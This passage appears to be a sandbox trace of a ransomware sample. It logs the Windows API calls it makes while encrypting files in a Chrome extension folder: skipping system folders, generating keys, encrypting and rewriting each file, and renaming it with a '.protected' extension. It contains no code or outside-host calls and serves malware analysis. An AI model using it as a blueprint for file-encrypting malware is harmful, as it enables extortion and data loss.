(lpFirst="feedback_script.js", lpSrch=".rar") returned 0x0 [0083.261] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js") returned 157 [0083.261] StrStrW (lpFirst="feedback_script.js", lpSrch=".zip") returned 0x0 [0083.261] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.269] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.269] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.269] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.269] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.270] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.270] CloseHandle (hObject=0x160) returned 1 [0083.270] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.protected") returned 167 [0083.270] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.protected")) returned 1 [0083.271] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.271] lstrcmpiW (lpString1="manifest.json", lpString2="Windows") returned -1 [0083.271] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files") returned -1 [0083.271] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files (x86)") returned -1 [0083.271] lstrcmpiW (lpString1="manifest.json", lpString2="$Recycle.bin") returned 1 [0083.271] lstrcmpiW (lpString1="manifest.json", lpString2="System Volume Information") returned -1 [0083.271] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json") returned 152 [0083.271] StrStrIW (lpFirst="manifest.json", lpSrch=".protected") returned 0x0 [0083.271] lstrcmpW (lpString1="manifest.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.271] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0083.271] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0083.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.272] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json") returned 152 [0083.272] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0083.272] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json") returned 152 [0083.272] StrStrW (lpFirst="manifest.json", lpSrch=".rar") returned 0x0 [0083.272] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json") returned 152 [0083.272] StrStrW (lpFirst="manifest.json", lpSrch=".zip") returned 0x0 [0083.272] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x8f8, lpOverlapped=0x0) returned 1 [0083.273] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffff708, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.273] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x8f8, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x8f8, lpOverlapped=0x0) returned 1 [0083.274] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.274] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.274] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.274] CloseHandle (hObject=0x160) returned 1 [0083.274] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.protected") returned 162 [0083.274] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.protected")) returned 1 [0083.275] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.275] lstrcmpiW (lpString1="material_css_min.css", lpString2="Windows") returned -1 [0083.275] lstrcmpiW (lpString1="material_css_min.css", lpString2="Program Files") returned -1 [0083.275] lstrcmpiW (lpString1="material_css_min.css", lpString2="Program Files (x86)") returned -1 [0083.275] lstrcmpiW (lpString1="material_css_min.css", lpString2="$Recycle.bin") returned 1 [0083.275] lstrcmpiW (lpString1="material_css_min.css", lpString2="System Volume Information") returned -1 [0083.275] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css") returned 159 [0083.275] StrStrIW (lpFirst="material_css_min.css", lpSrch=".protected") returned 0x0 [0083.275] lstrcmpW (lpString1="material_css_min.css", lpString2="RESTORE_FILES.txt") returned -1 [0083.275] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0083.275] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0083.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.276] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css") returned 159 [0083.276] StrStrW (lpFirst="material_css_min.css", lpSrch=".txt") returned 0x0 [0083.276] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css") returned 159 [0083.276] StrStrW (lpFirst="material_css_min.css", lpSrch=".rar") returned 0x0 [0083.276] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css") returned 159 [0083.276] StrStrW (lpFirst="material_css_min.css", lpSrch=".zip") returned 0x0 [0083.276] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.289] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.289] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.289] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.289] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.295] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.295] CloseHandle (hObject=0x160) returned 1 [0083.296] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.protected") returned 169 [0083.296] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.protected")) returned 1 [0083.297] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.297] lstrcmpiW (lpString1="mirroring_cast_streaming.js", lpString2="Windows") returned -1 [0083.297] lstrcmpiW (lpString1="mirroring_cast_streaming.js", lpString2="Program Files") returned -1 [0083.297] lstrcmpiW (lpString1="mirroring_cast_streaming.js", lpString2="Program Files (x86)") returned -1 [0083.297] lstrcmpiW (lpString1="mirroring_cast_streaming.js", lpString2="$Recycle.bin") returned 1 [0083.297] lstrcmpiW (lpString1="mirroring_cast_streaming.js", lpString2="System Volume Information") returned -1 [0083.297] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js") returned 166 [0083.297] StrStrIW (lpFirst="mirroring_cast_streaming.js", lpSrch=".protected") returned 0x0 [0083.297] lstrcmpW (lpString1="mirroring_cast_streaming.js", lpString2="RESTORE_FILES.txt") returned -1 [0083.297] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0083.297] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0083.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.298] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js") returned 166 [0083.298] StrStrW (lpFirst="mirroring_cast_streaming.js", lpSrch=".txt") returned 0x0 [0083.298] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js") returned 166 [0083.298] StrStrW (lpFirst="mirroring_cast_streaming.js", lpSrch=".rar") returned 0x0 [0083.298] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js") returned 166 [0083.298] StrStrW (lpFirst="mirroring_cast_streaming.js", lpSrch=".zip") returned 0x0 [0083.298] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.304] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.304] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.304] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.304] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.305] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.305] CloseHandle (hObject=0x160) returned 1 [0083.305] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.protected") returned 176 [0083.305] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.protected")) returned 1 [0083.306] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.306] lstrcmpiW (lpString1="mirroring_common.js", lpString2="Windows") returned -1 [0083.306] lstrcmpiW (lpString1="mirroring_common.js", lpString2="Program Files") returned -1 [0083.306] lstrcmpiW (lpString1="mirroring_common.js", lpString2="Program Files (x86)") returned -1 [0083.306] lstrcmpiW (lpString1="mirroring_common.js", lpString2="$Recycle.bin") returned 1 [0083.306] lstrcmpiW (lpString1="mirroring_common.js", lpString2="System Volume Information") returned -1 [0083.306] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js") returned 158 [0083.306] StrStrIW (lpFirst="mirroring_common.js", lpSrch=".protected") returned 0x0 [0083.306] lstrcmpW (lpString1="mirroring_common.js", lpString2="RESTORE_FILES.txt") returned -1 [0083.306] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0083.306] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0083.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.307] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js") returned 158 [0083.307] StrStrW (lpFirst="mirroring_common.js", lpSrch=".txt") returned 0x0 [0083.307] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js") returned 158 [0083.307] StrStrW (lpFirst="mirroring_common.js", lpSrch=".rar") returned 0x0 [0083.307] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js") returned 158 [0083.307] StrStrW (lpFirst="mirroring_common.js", lpSrch=".zip") returned 0x0 [0083.307] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.312] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.312] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.312] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.312] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.317] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.318] CloseHandle (hObject=0x160) returned 1 [0083.318] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.protected") returned 168 [0083.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.protected")) returned 1 [0083.319] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.319] lstrcmpiW (lpString1="mirroring_hangouts.js", lpString2="Windows") returned -1 [0083.319] lstrcmpiW (lpString1="mirroring_hangouts.js", lpString2="Program Files") returned -1 [0083.319] lstrcmpiW (lpString1="mirroring_hangouts.js", lpString2="Program Files (x86)") returned -1 [0083.319] lstrcmpiW (lpString1="mirroring_hangouts.js", lpString2="$Recycle.bin") returned 1 [0083.319] lstrcmpiW (lpString1="mirroring_hangouts.js", lpString2="System Volume Information") returned -1 [0083.319] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js") returned 160 [0083.319] StrStrIW (lpFirst="mirroring_hangouts.js", lpSrch=".protected") returned 0x0 [0083.319] lstrcmpW 